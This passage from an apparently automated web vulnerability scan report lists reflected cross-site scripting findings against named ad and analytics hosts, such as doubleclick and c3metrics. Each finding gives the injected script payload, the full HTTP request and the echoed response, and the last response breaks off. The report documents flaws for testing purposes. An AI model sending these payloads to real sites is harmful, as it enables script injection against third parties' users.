Set-Cookie: bpd=1_1301677315_h9i9:Aq40; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: apd=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: scg=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: ppd=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: afl=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 01 Apr 2011 17:01:55 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landinga1c83<x style=x:expression(alert(1))>6abbaef0b4c' *not* found -->

2.32. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 15ac4<script>alert(1)</script>2c7cb34e591 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1301681747022&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-2873892966714049&slotname=Header-Logo_468x6015ac4<script>alert(1)</script>2c7cb34e591&page_slots=Header-Logo_468x60&cookie_enabled=1&url=http%3A%2F%2Fwww.androidtapp.com%2Ffavicon.icoef3b2%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Ed2de5acaa49&ref=http%3A%2F%2Fburp%2Fshow%2F38&lmt=1301699700&dt=1301681747026&cc=17&biw=1134&bih=1004&ifi=1&adk=2159343720&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=1576293089.1301681747&ga_sid=1301681747&ga_hid=1506484284 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 18:16:52 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 2804
X-XSS-Protection: 1; mode=block

GA_googleSetAdContentsBySlotForSync({"Header-Logo_468x6015ac4<script>alert(1)</script>2c7cb34e591":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

2.33. http://suggest.infospace.com/QuerySuggest/SuggestServlet [reqID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://suggest.infospace.com
Path:   /QuerySuggest/SuggestServlet

Issue detail

The value of the reqID request parameter is copied into the HTML document as plain text between tags. The payload fc91e<script>alert(1)</script>dbedd732ef was submitted in the reqID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /QuerySuggest/SuggestServlet?prefix=site%3Axs&reqID=JscriptId1301677023385fc91e<script>alert(1)</script>dbedd732ef HTTP/1.1
Host: suggest.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 97
Date: Fri, 01 Apr 2011 16:57:02 GMT
Connection: close

iSuggest.PopulateResults(null, "JscriptId1301677023385fc91e<script>alert(1)</script>dbedd732ef");

2.34. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 8e422<script>alert(1)</script>f34f9bd50bb was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4808e422<script>alert(1)</script>f34f9bd50bb&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:23 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-SM=adver_04-01-2011-18-11-23; expires=Mon, 04-Apr-2011 18:11:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-VT=adver_04-01-2011-18-11-23_13441394191301681483; expires=Wed, 30-Mar-2016 18:11:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-nUID=adver_13441394191301681483; expires=Fri, 01-Apr-2011 18:26:23 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4808e422<script>alert(1)</script>f34f9bd50bb';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='13441394191301681483';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv=
...[SNIP]...

2.35. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7981b<script>alert(1)</script>31ea891ceea was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver7981b<script>alert(1)</script>31ea891ceea&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:20 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:20 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-54_430031711301681454ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver7981b%3Cscript%3Ealert%281%29%3C%2Fscript%3E31ea891ceea_04-01-2011-18-11-20_15585547251301681480; expires=Wed, 30-Mar-2016 18:11:20 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_430031711301681454ZZZZadcon_13920678781301681468ZZZZadver7981b%3Cscript%3Ealert%281%29%3C%2Fscript%3E31ea891ceea_15585547251301681480; expires=Fri, 01-Apr-2011 18:26:20 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver7981b<script>alert(1)</script>31ea891ceea';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='155855472513016
...[SNIP]...

2.36. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d177f<script>alert(1)</script>3c8db14e364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/d177f<script>alert(1)</script>3c8db14e364&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-35_4412925081301681495; expires=Wed, 30-Mar-2016 18:11:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_4412925081301681495; expires=Fri, 01-Apr-2011 18:26:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='4412925081301681495';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/d177f<script>alert(1)</script>3c8db14e364';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.37. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 63583<script>alert(1)</script>77c5e15e0f0 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=63583<script>alert(1)</script>77c5e15e0f0&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:28 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:28 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-28_14327144791301681488; expires=Wed, 30-Mar-2016 18:11:28 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_14327144791301681488; expires=Fri, 01-Apr-2011 18:26:28 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
97811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='14327144791301681488';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='63583<script>alert(1)</script>77c5e15e0f0';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

2.38. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 1d999<script>alert(1)</script>86c5c8291e2 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=721d999<script>alert(1)</script>86c5c8291e2&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:25 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Sun, 01-May-2011 19:11:25 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-25_11684440531301681485; expires=Wed, 30-Mar-2016 18:11:25 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_11684440531301681485; expires=Fri, 01-Apr-2011 18:26:25 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='11684440531301681485';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='721d999<script>alert(1)</script>86c5c8291e2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

2.39. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload abc86<script>alert(1)</script>be32452b256 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=abc86<script>alert(1)</script>be32452b256&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:30 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:30 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-30_9906481791301681490; expires=Wed, 30-Mar-2016 18:11:30 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_9906481791301681490; expires=Fri, 01-Apr-2011 18:26:30 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='9906481791301681490';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='abc86<script>alert(1)</script>be32452b256';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.40. http://view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 526ca<script>alert(1)</script>58bb247d50a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480526ca<script>alert(1)</script>58bb247d50a&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:54 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480526ca<script>alert(1)</script>58bb247d50a&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a
...[SNIP]...

2.41. http://view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 4591c<script>alert(1)</script>0799c40acaf was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver4591c<script>alert(1)</script>0799c40acaf&cid=480&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:51 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver4591c<script>alert(1)</script>0799c40acaf&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new
...[SNIP]...

2.42. http://view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 22ab3<script>alert(1)</script>aba291a8b78 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=7222ab3<script>alert(1)</script>aba291a8b78 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

